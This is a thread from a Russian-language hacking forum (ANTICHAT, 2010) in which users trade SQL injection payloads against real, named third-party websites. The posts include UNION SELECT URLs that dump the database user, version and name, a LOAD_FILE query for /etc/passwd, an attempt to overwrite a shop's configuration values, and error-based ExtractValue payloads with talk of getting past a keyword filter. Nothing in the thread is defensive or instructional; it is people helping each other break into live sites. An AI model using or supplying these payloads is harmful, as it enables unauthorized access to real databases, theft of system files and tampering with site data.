ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.07.2010, 19:48
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607
Репутация:
19
|
|
ггг, сенкю
|
|
|
03.07.2010, 21:04
|
|
Познающий
Регистрация: 03.06.2007
Сообщений: 31
Провел на форуме:
163026
Репутация:
3
|
|
А можно ли че нить сделать с этим http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=17416'
|
|
|
|
03.07.2010, 21:10
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
Провел на форуме:
287607
Репутация:
19
|
|
Сообщение от Fak1r
Fak1r said:
А можно ли че нить сделать с этим http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=17416'
_http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=-17416'+UNION+SELECT+1,USER(),VERSION(),4,DATABASE( ),6,7,8,9,10+--+
|
|
|
|
04.07.2010, 13:59
|
|
Постоянный
Регистрация: 22.05.2009
Сообщений: 514
Провел на форуме:
3579051
Репутация:
133
|
|
http://www.besedin.com/zerkalo/foto.php?id=-6075%27+union+select+1,LOAD_FILE%28%27/etc/passwd%27%29,3,4,5+from+mysql.user--+
не могу найти пути
Помогите плз
|
|
|
|
04.07.2010, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
7263
Репутация:
0
|
|
День добрый, есть линк
Сообщение от None
id=-1+union+select+1,2,concat_ws(char(59),ConfigName,C onfigValue),4,5,6,7,8,9+from+settings+where+Config Name='foot'+--+
отлично работает. нужно проапдейтить ConfigValue, update после юниона не канает
Сообщение от None
-1+union+update+settings+set+ConfigValue=0x61+where +ConfigName=0x666F6F74+--+
можно ли сделать что-то вроде
Сообщение от None
-1+||+(update+settings+set+ConfigValue=0x61+where+C onfigName=0x666F6F74)+--+
как быть?
*линк пмну, это бескартонный шоп, но нужен =__= |
|
|
|
04.07.2010, 17:13
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Aels
Aels said:
День добрый, есть линк
отлично работает. нужно проапдейтить ConfigValue, update после юниона не канает
можно ли сделать что-то вроде
как быть?
*линк пмну, это бескартонный шоп, но нужен =__=
нельзя
|
|
|
|
04.07.2010, 17:14
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от shuba
shuba said:
http://www.besedin.com/zerkalo/foto.php?id=-6075%27+union+select+1,LOAD_FILE%28%27/etc/passwd%27%29,3,4,5+from+mysql.user--+
не могу найти пути
Помогите плз
ищи в конфигах путь
клац
|
|
|
|
04.07.2010, 19:58
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
38021
Репутация:
3
|
|
Есть SQL-INJ
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]ExtractValue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x5c[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]select version[/COLOR][COLOR="#007700"]())))--+[/COLOR][/COLOR]
фильтруются слова union|where|table_name|user|column_name|, самое главное это table_name, какими способами возможно обойти фильтр на слово table_name, ибо узнать таблицу с админа не как не удается..
делал
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]and[/COLOR][COLOR="#0000BB"]ExtractValue[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x5c[/COLOR][COLOR="#007700"],([/COLOR][COLOR="#0000BB"]select unhex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x7461626C655F6E616D65[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables limit 16[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])))--+[/COLOR][/COLOR]
результата не дало.. |
|
|
|
04.07.2010, 20:00
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
С регистром играться не пробовал?
|
|
|
|
04.07.2010, 20:03
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
38021
Репутация:
3
|
|
пробовал )
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
